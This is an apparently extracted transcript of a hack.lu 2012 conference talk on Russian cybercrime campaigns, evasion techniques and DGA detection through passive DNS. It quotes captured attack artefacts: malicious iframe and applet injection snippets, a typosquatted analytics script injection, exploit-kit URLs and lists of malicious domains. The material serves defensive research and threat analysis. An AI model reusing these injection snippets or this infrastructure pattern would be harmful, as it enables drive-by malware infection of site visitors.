hacklu2012 v07
DESCRIPTION
TRANSCRIPT
CyberCrime 2012As we know it -
Trends, Monitoring,
Real Time Detection
@fygrave@vbkropotov
Presented at hack.lu 2012
3
agenda
CyberCrime 2012: trendsMalicious campaigns in 2012 (case studies)Evolving evasion techniquesAutomating Detection real-timeConclusions
4
About speakers
● We are from Russia.. kind of ;)
5
Cybercrime 2012trends
6
Emerging attack vectors
● DbD – old. Still popular– High profile targets are getting compromised
● Email campaigns – getting bigger, mass mailings to users from compromised targets
● Social Engineering attacks ● Mobile plays active role
7
Malicious Campaigns Sept 2011-Oct 2012
Case studies
8
Autumn 2011kp.ru National-wide newspaper?
● ~550 000 visitors per day● Drive-By..
9
10
Autumn 2011rzd.ru National Railroads?
● ~200 000 visitors per day
● “Gimme a Malware!!”
11
Yepp, rzd-rzd.ru as an intermediate
12
13
Just TWO Domains, SURE?Domain URLinterfax-rzd.in http://interfax-rzd.in/news/buble.php?key=rtgddfg%26u=root
rzd-interfax-online.in http://rzd-interfax-online.in/rzd-news/buble.php?key=rtgddfg%26u=root
news-rzdstyle.in http://news-rzdstyle.in/new-mail/buble.php?key=rtgddfg%26u=root
rzd-rzd.in http://rzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root
therzd-rzd.in http://therzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root
rzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/buble.php?key=rtgddfg%26u=root
rzd-rzdcomp.inhttp://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root
rzd-rzdcomp.inhttp://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root;1
press-rzd.in http://press-rzd.in/rzd/buble.php?key=rtgddfg%26u=root
rzd-press.in http://rzd-press.in/rzd/buble.php?key=rtgddfg%26u=root
rzd-banner.in http://rzd-banner.in/rzd/buble.php?key=rtgddfg%26u=root
pass-rzd.in http://pass-rzd.in/rzd/buble.php?key=rtgddfg%26u=root
rzd-ticket.in http://rzd-ticket.in/zd/buble.php?key=rtgddfg%26u=root
14
Campaign
15
italia-new.inbaner-klerk.ru bank-klerk.ru
banner-klerk.ru blogs-klerk.ru buh-klerk.ru daily-kp.ru eg-obzor.ru
forum-klerk.ru i-obozrevatel.ru interfax-region.ru
ipgeobase.in
job-klerk.ru klerk-bank.ru klerk-bankir.ruklerk-biz.ru
klerk-boss.ru klerk-buh.ru
klerk-even.ru klerk-events.ru klerk-forum.ruklerk-law.ru klerk-new.ru klerk-news.ru
klerk-reklama.ru klerk-ru.ru
klerk-work.ru klerk2.ru
obozrevatel-ru.ru obozrevatelru.ru
kp-daily.rukp-kp.in
minsk-kp.inperm-kp.inwiki-klerk.ru
Similar style detected domains
16
Klerk.ru
● Finance related portal ● ~150 000 visitors per day
17
“fileless” bot Campaign 2011 – Oct 2012
● Version 1 (detected) Nov 2011● Version 2 (detected) Feb-Mar 2012● Version 3 (detected) May 2012● Version 4 (detected) First seen in Aug 2012
Last detect in Oct 2012 (distributed via infected banner networks too)
18
glavbukh.ru (Chief Accountant)~45 000 targeted visitors per day
Date detected
IP Domain Url Domain created
Referrer
09/Nov/2011 176.9.50.178 jya56yhsvcsss.com /BVRQ 08/Nov/2011 glavbukh.ru
11/Nov/2011 176.9.50.178 ha526ugfsfh.com /BVRQ 11/Nov/2011 glavbukh.ru
06/Feb/2012 66.199.232.98 zcxrwuj4b.eu /GLMF 26/Jan/2012 glavbukh.ru
13/Feb/2012 66.199.232.9 zaurona.eu /GLMF 08/Feb/2012 glavbukh.ru
20/Apr/2012 64.20.35.194 vuyrtyal.info /RK85 04/Apr/2012 glavbukh.ru
03/May/2012 64.20.35.194 hortezam.info /RK85 24/Apr/2012 glavbukh.ru
19
glavbukh.ru, tks.ru, etc. May 2012
:arg hl=us&source=hp&q=-1785331712&aq=f&aqi=&aql=&oq=
:field Adobe Flash Player 11 ActiveX|1.Conexant 20585 SmartAudio HD|3.ThinkPad Modem Adapter|7.Security Update for Windows XP (KB2079403)|1.Security Update for Windows XP (KB2115168)|1.Security Update for Windows XP (KB2229593)|1.Security Update for Windows
20
Drive-by newsru.com ver. Sept 2012
Domains on Sep 11 2012
21
Permanent fails, fileles bot Campaign 2011 – Oct 2012
● Finance related portal ● ~130 000 visitors per day
<iframe src="http://riflepick.net/7GIC"><html lang="en" dir="ltr"><head><body class="normal" cosmic="force" onload="netti()" style="background: #fff; font-face: sans-serif"><div id="duquiddiv"></div><a class="motivator" name="top"></a><div style="display:block;width:1px;height:1px;overflow:hidden;">
<applet archive="/07GICjq" code="Applet.class">
Sep 17 2012 echo.msk.ru ~440 000 visitors per day
22
Permanent fails, fileles bot Campaign 2011 – Oct 2012
<iframe src="http://riflepick.net/7GIC"><html lang="en" dir="ltr"><head><body class="normal" cosmic="force" onload="netti()" style="background: #fff; font-face: sans-serif"><div id="duquiddiv"></div><a class="motivator" name="top"></a><div style="display:block;width:1px;height:1px;overflow:hidden;"><applet archive="/07GICjq" code="Applet.class">
Sep 17 2012 Banner network adfox.ru affected
23
Campaign participants examplesDomain Resource type When seen unique hosts
per day
Vesti.ru TV news Autumn 2012 ~ 930 000
gazeta.ru news Winter 2012-Autumn 2012 ~490 000
newsru.com news Spring 2012 - Autumn 2012 ~470 000
echo.msk.ru radio Autumn 2012 ~440 000
3DNews.ru news Summer 2012 – Autumn 2012 ~180 000
inosmi.ru news Autumn 2011 – Summer 2012 115 000
glavbukh.ru Accountants Winter 2012-Spring 2012 ~45 000
tks.ru Finance (Import/Explort)
Winter 2012-Autumn 2012 ~23 000
24
Mobile scam
http://codbanners.ru
25
Mobile scams
● Fake apps are still big● Android apps avail :)
26
27
• Legal • Faked
Another news,another
phone…
28
29
Evolution of Counter-Detection andEvasion Techniques
31
Malware hostings location interesting examples
Countries, hosters and slide with VPN “#epicfail” in configuration.
Sample in gov.ua and Ogni Moskvu bank
32
Drive By from Bank IP rangeDate/Time 2011-11-25 15:45:27 MSKTag Name Java_Possibly_Malicious_Applet
server 1541897761 URL /dfbgeskdfa/Gmail.class
Packet DestinationAddress 10.X.X.X Packet DestinationPort 42642 Packet SourceAddress 91.231.126.33 Packet SourcePort 80 Packet
netnum: 91.231.126.0 - 91.231.126.255netname: ognmorganisation: ORG-LCM2-RIPEorg-name: LTD CB "OGNI MOSKVY"address: 27 st. New Basmannayaaddress: 105066, Moscow,address: Russiae-mail: [email protected] (mailto:[email protected])phone: +7 495 7805181
Gmail.class - Exploit:Java/CVE-2010-0840
33
Drive By from State Land Cadastral Center at the State Agency of Land
Resources of Ukraine RangeDate/Time 2011-11-13 11:34:08 MSKTag Name Java_Possibly_Malicious_Applet
server 1539495587 URL /Gmail.class
Packet DestinationAddress 10.X.X.X Packet DestinationPort 40487Packet SourceAddress 91.194.214.163 Packet SourcePort 80 Packet
netnum: 91.194.214.0 - 91.194.215.255netname: SLCCdescr: State Land Cadastral Center at the State Agency of Land Resources of Ukrainecountry: UAorganisation: ORG-SLCC1-RIPEaddress: 3 Narodnogo Opolchenya street, Kiev, Ukraine
Gmail.class - Exploit:Java/CVE-2010-0840
34
Back end Epic Fail Mar 13 2011 VPN 95.163.66.197 real 91.194.214.71
Exploit pack in UA State agency of land resources IP range still alive
35
Not typical (now typical :-) attacks Examples
- Attacks using stolen/misconfigured DNS accounts
- Attacks that require real-user interaction
- Intermediate hostnames with similar hostnames (to make manual analysis trouble-some?)
- Drive by “FTP” types of attacks
36
Stolen domains example:
Time URL IP24/Jan/2012:18:59:54 GET http://csrv2.fatdiary.org/main.php?page=7a5a09bea4d91836 146.185.242.69
24/Jan/2012:19:00:18 GET http://csrv2.fatdiary.org/content/field.swf HTTP/1.0 146.185.242.69
25/Jan/2012:09:36:31 GET http://csrv15.amurt.org.uk/main.php?page=7a5a09bea4d91836 146.185.242.69
25/Jan/2012:09:36:33 GET http://csrv15.amurt.org.uk/content/fdp2.php?f=17 146.185.242.69
25/Jan/2012:09:36:44 GET http://csrv15.amurt.org.uk/content/field.swf 146.185.242.69
25/Jan/2012:09:36:45 GET http://csrv15.amurt.org.uk/content/v1.jar 146.185.242.69
25/Jan/2012:09:36:48 GET http://csrv15.amurt.org.uk/w.php?f=17%26e=0 146.185.242.69
26/Jan/2012:07:28:05 GET http://csrv23.UIUIopenvrml.org/main.php?page=7a5a09bea4d91836
146.185.242.69
31/Jan/2012:10:27:35 GET http://csrv24.air-bagan.org/main.php?page=7a5a09bea4d91836 146.185.242.79
31/Jan/2012:10:27:47 GET http://csrv24.air-bagan.org/content/rino.jar 146.185.242.79
31/Jan/2012:18:18:51 GET http://csrv35.air-bagan.org/main.php?page=7a5a09bea4d91836 146.185.242.79
31/Jan/2012:18:19:03 GET http://csrv35.air-bagan.org/getJavaInfo.jar 146.185.242.79
04/Feb/2012:12:02:51 GET http://csrv29.prawda2.info/main.php?page=7a5a09bea4d91836 146.185.242.79
06/Feb/2012:09:08:51 GET http://csrv89.prawda2.info/main.php?page=7a5a09bea4d91836 146.185.242.79
37
WHAT'S COMMON
amurt.org.uk 46.227.202.68 Registered on: 15-Oct-1999
Name servers: ns1.afraid.org
air-bagan.org 122.155.190.31 Created On:05-Aug-2006
Name Server:NS1.AFRAID.ORG
fatdiary.org 71.237.151.22 Created On:17-Jul-2006
Name Server:NS1.AFRAID.ORG
prawda2.info 91.192.39.83 Created On:18-Oct-2007
Name Server:NS1.AFRAID.ORG
38
Malware domains reputation and DNS accounts attacks
Starting from August 2012 we detect second wave of this campaign, be careful, examples Sep 2012
alex01.net -> 46.39.237.81 >>> games.alex01.net -> 178.162.132.178
socceradventure.net 72.8.150.14 >>> mobilki.socceradventure.net -> 178.162.132.178
talleresnahuel.com 74.54.202.162 >>> kino.talleresnahuel.com -> 178.162.132.178
qultivator.se 72.8.150.15 >>> 597821.qultivator.se -> 178.162.132.166
39
Carberp campaign Mar – May 2012 with tiny user interaction
function() { var url = 'http://yyzola.gpbbsdhmjm.shacknet.nu/g/'; … document.onmousemove = function() {
…
40
Hacked Domains from Spring Carberp campaignhoster rel-net.eu 62.122.72.0 - 62.122.79.255
009.ru1.poliklinika72.ru1c-documents.ru232info.rualrf.ruambulatorya.ruarkan.ruaryahome.ruaryatekstil.ruato.ruauto-pik.rubablam.rubadger.rubeauty-breeze.ruberkem.rubestwatch.rubounty72.rubronipoezd.rucar-baby.ruchalet-cpark.rucrocus-hall.ruct.spb.ru
ctc-tv.rudailypixel.rudataplex.rudoctor-istomin.rudraiverton.imho2.rudtr.bydvvs.ruedimvkusno.rueka4.ruexpert-kld.rufamily-fitness.rufastrans.rufflow.rufictionbook.ruflowers-fantasy.rugidrostyle.ruguitarism.ruhmcity.ruhotel-sokol.ruipoteka-tmn.ruizvestia.ru
kb83.comknowingsnibiru.rukolobok80.rukontaktor.rukuhni-mila.rukyokushinkarate.rulaccent.rulenovofans.rulifenews.rumaleton.rumandroid.rumanualbase.rumarianowka.rumarte.rumaxime-and-co.commedin.rumedin.rumenyaraduet.rumexa-n.rumolurist.rumps-energo.runew.turbinist.ru
oilloot.ruorthographia.ruostrov72.rupod-remont.ruregion64.ruremont-
krasnogorsk.rurevital.ruribalkadaohota.rurostteh.rurstmos.rurusso-excursio.frsakuraauto.rusellex.rushop-detect.ruskk-chess.ruskypecashin.ruspdnv.ruspk-up.rusport.optika-8.rustroyoffis.rustud.samgtu.rustyle.aladna.ru
subsidii.nettopsalon.rutouravia.rutushkan.netumade.ruvantatech.ruvash-master-
remont.ruvideoecology.ruvinils.ruvms56.ruvolociki.ruvonny-and-dolan.ruvosesoftware.comwinfield-oil.ruwusley.ruyarglobus.ruzip.ruzooeco.comтурбинист.рф
41
Domains with interesting namesIntermediate domains names often similar to
hacked domain name, or to well known banner network or counter.
Spot the differencies: ●google-analytics.com vs.●google-analylics.com ●google-anatylics.com
42
Trud.ru affected feb 21 2012<script type="text/javascript">
● var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");●
● document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
● </script>● <script type="text/javascript">● var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");●
● document.write(unescape("%3Cscript src='" + gaJsHost + "google-analitycs.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
● </script>●
● Name: google-analytics.com Addresses: 173.194.32.48●
● Name: www.google-analitycs.com Address: 184.82.149.180●
43
Noproblemslove.com, whoismistergreen.com, etc...
● Bot Infection: Drive-By-HTTP● Payload and intermediate malware
domains:Normal /DynDNS● Distributed via: Compromised web-sites. ● C&C domains: normal.● C&C and Malware domains located on the
different AS. Sophisticated attack scheme. Timeout before activity.
● Typical bot activity: Mass HTTP Post
44
Noproblemslove.com, whoismistergreen.com, etc...
45
Interesting domains from range 184.82.149.178-184.82.149.180 (Feb 2012)
Domain Name IP
www.google-analylics.com 184.82.149.179
google-anatylics.com 184.82.149.178
www.google-analitycs.com 184.82.149.180
webmaster-google.ru 184.82.149.178
paged2.googlesyndlcation.com 184.82.149.179
googlefilter.ru 184.82.149.179
rambler-analytics.ru 184.82.149.179
site-yandex.net 184.82.149.180
paged2.googlesyndlcation.com 184.82.149.179
www.yandex-analytics.ru 184.82.149.178
googles.4pu.com 184.82.149.178
googleapis.www1.biz 184.82.149.178
syn1-adriver.ru 184.82.149.178
46
C&C domainswhoismistergreen.com
IP-адрес: 213.5.68.105
Create: 2011-07-26
Registrant Name: JOHN ABRAHAM
Address: ul. Dubois 119
City: Lodz
noproblemslove.com
213.5.68.105
Created: 2011-12-07
Registrant Contact:
Whois Privacy Protection Service
Whois Agent [email protected]
noproblemsbro.com
176.65.166.28
Created: 2011-12-07
Registrant Contact:
Whois Privacy Protection Service
Whois Agent [email protected]
patr1ckjane.com
IP Was 176.65.166.28
IP Now 213.5.68.105
Create: 2011-07-21
Registrant Name: patrick jane
Address: ul. Dubois 119
City: Lodz
47
Not typical attacks via FTP
First seen 24/10/2011 11:28 ftp://1572572686/Main.class
Sample Mar 07 java version as a password
48
Domain URL Referrer Payload Size
3645455029 /1/s.html Infected site html 997
Java.com /js/deployJava.js 3645455029 javascript 4923
3645455029 /1/exp.jar application/x-jar
18046
3645455029 /file1.dat application/executable
138352
49
Attack analysis- Script from www. Java.com used during attack.
- Applet exp.jar loaded by FTP
- FTP Server IP address obfuscated to avoid detection
50
Not Found?
51
Interesting modificationsGET http://java.com/ru/download
/windows_ie.jsp?host=java.com%26
returnPage=ftp://217.73.58.181/1/s.html%26
locale=ru HTTP/1.1
Key feature exampleDate/Time 2012-04-20 11:11:49 MSD
Tag Name FTP_Pass
Target IP Address 217.73.63.202
Target Object Name 21
:password Java1.6.0_30@:user anonymous
52
Registrar abuse(1)
● gidzzkc.dogbookeoor-amtuzxo.org. A 91.220.84.7● yqvdmbul.dogbookeoor-amtuzxo.org. A 91.220.84.7● fncalzrmx.dogbookeoor-amtuzxo.org. A 91.220.84.7● ghyyaweczb.dogbookeoor-amtuzxo.org. A 91.220.84.7● vrmvneod.catxnahi-yarndfhh.info. A 91.220.84.6● wrxpvxdudahlu.catxnahi-yarndfhh.info. A 91.220.84.6● owcfudqqlgowwn.catxnahi-yarndfhh.info.A 91.220.84.6● rskgwknaz.video-zgn-gqmbcax.info. A 91.220.84.6● ahlcpdmssw.video-zgn-gqmbcax.info. A 91.220.84.6● xrwxozkniqq.video-zgn-gqmbcax.info. A 91.220.84.6● ighirfzcxdrii.video-zgn-gqmbcax.info. A 91.220.84.6
53
Registrar abuse (2)
● mlfskgdbwnfos.baseball-payed-mzigsy-voo.org 91.237.153.16
● onlkzxxlzbbgiy.payed-football-bciz-ydmslry.org 91.237.153.16
● Domains disappear without a trace within 30 minutes after use.
54
Registrar abuse (3)● http://raisport.ru/contacts >>>
xugamabpi.arraysort-qmppbkkn-abkn.org
● http://k62cg56m62.dyndns.info/js/vip.php?s=MSIE&n=8 >>> onlkzxxlzbbgiy.payed-football-bciz-ydmslry.org
● http://iked5gikr.ocry.com/do.php >>> fblcatagg.string-panelpvli-qbo-bmvf.org
55
Legit domains are used ..
11.09.2012
http://out1.sudameris.com.ar/out
qehboobwkqvo.task-games-pta-vywcngn.org
91.237.153.24
56
What could be more flux than fastflux? ;-)
● WHOIS fastflux … HOW?!
Domain ID:D166393631-LRORDomain Name:FOOTBALL-SECURITY-WETRLSGPIEO.ORGCreated On:21-Aug-2012 01:23:52 UTCLast Updated On:21-Aug-2012 01:23:53 UTCExpiration Date:21-Aug-2013 01:23:52 UTCSponsoring Registrar:Click Registrar, Inc. d/b/apublicdomainregistry.com (R1935-LROR)Status:CLIENT TRANSFER PROHIBITEDStatus:TRANSFER PROHIBITEDStatus:ADDPERIODRegistrant ID:PP-SP-001Registrant Name:Domain AdminRegistrant Organization:PrivacyProtect.orgRegistrant Street1:ID#10760, PO Box 16Registrant Street2:Note - All Postal Mails Rejected, visit Privacyprotect.orgRegistrant Street3:Registrant City:Nobby BeachRegistrant State/Province:Registrant Postal Code:QLD 4218Registrant Country:AURegistrant Phone:+45.36946676
57
Russian ASN (as5577)
58
Intermediate ev2.ru, SpyEye Campaign
59
Words distribution (len >3) in domain names
60
Incidents vs. timeCIRCL team
informed
61
DEMOTIME: SHOWSOME VIDEOZHERE :)
62
Advanced bots:Social network as C&C
63
Evasion techniques:summary
- Evasion of automated detection of compromised resource (via crawler)- Evasion of automated detection of compromised resource (via sandbox)- Evasion techniques used in exploit serving mechanisms and malicious payloads- Counter-analysis techniques (in infrastructure)
64
Detection 2012
65
Detecting DGA through DNS traffic
Input: DNS packets (passive DNS)Output: list of active domains
List of “could be active” domainsList of “were active” domains
IP addresses used by mal. infrastructure
66
DGA pattern: How it looks on the wire
67
Detecting DGA
● Simplified algorithm:– take domains with failed DNS lookup (rcode: 2, non-
existant domain or rcode:3, domain name server failed)
– Group them by similarity function f(x)
– Find domains with even distribution.– Identify other domains matching the same similarity
criteria f(x)
– Discover relevant IP addresses– Rinse and repeat :)
68
Detection: related works
From Throw-Away Traffic to Bots: Detecting Rise of DGA-Based Malware (Manos Antonakakis, Roberto Redisci et al) (2012)
L. Bilge, E. Kirda, C. Kruegel, and M. Balduzzi.
EXPOSURE: Finding malicious domains using
passive dns analysis. In Proceedings of NDSS,
2011
etc..
69
What we do differently:
● “lazy” WHOIS lookups, team cymru IP to ASN lookups
● Our own passive DNS index● Sandbox farm (mainly to detect compromised
websites automagically and study behavior)
70
Architecture
71
Sample analysis (step by step)
● Start looking for a failed pattern and cluster id:
72
Sample analysis (two)
● Get the cluster ID: (eu_11_14)
Clustering is based on domain similarity. Currently used characteristics: - f(zone, pattern (length, depth)) - additional characteristics (building up): natural language domain vs. generated string (occurrence of two-character sequences - n-grams)- domain registration parameters (obtained via WHOIS [ problematic! ] )- cross-reference with existing malicious IP and AS reputation database (incrementally built by us)
73
Sample analysis
● Get other members of the cluster
74
Sample analysis
● Find common members (notice avatarmaker.eu could be a false positive, easily filtered out through common denominator filering (IP, WHOIS information)
75
Sample analysis
● So we have C&C IP 66.175.210.173● we can continue mining to see if we get any
other domain names:
76
IP → domain transform
77
Automation
78
Performance
● On single machine (32Gb RAM) we run up to 2000 pkt/sec without significant performance loss
● Average load:
79
Other Interesting numbers
● Packets per day: ~130M filtered.● Mal. Domains/day: ~30k DNS queries (varies)● Avg. 30-50 req/minute for single domain●
80
Uses of the data
● Obvious: blacklists● Botnet take overs (costs 11USD or less ;)● Sinkholing
81
Demotime :)
● (demos, lets look at some videos :)
82
Questions?
@fygrave@vbkropotov
83
Feedback:@fygrave
@vbkropotov(also @ gmail.com)
Code:
https://github.com/fygrave/dnslyzer.git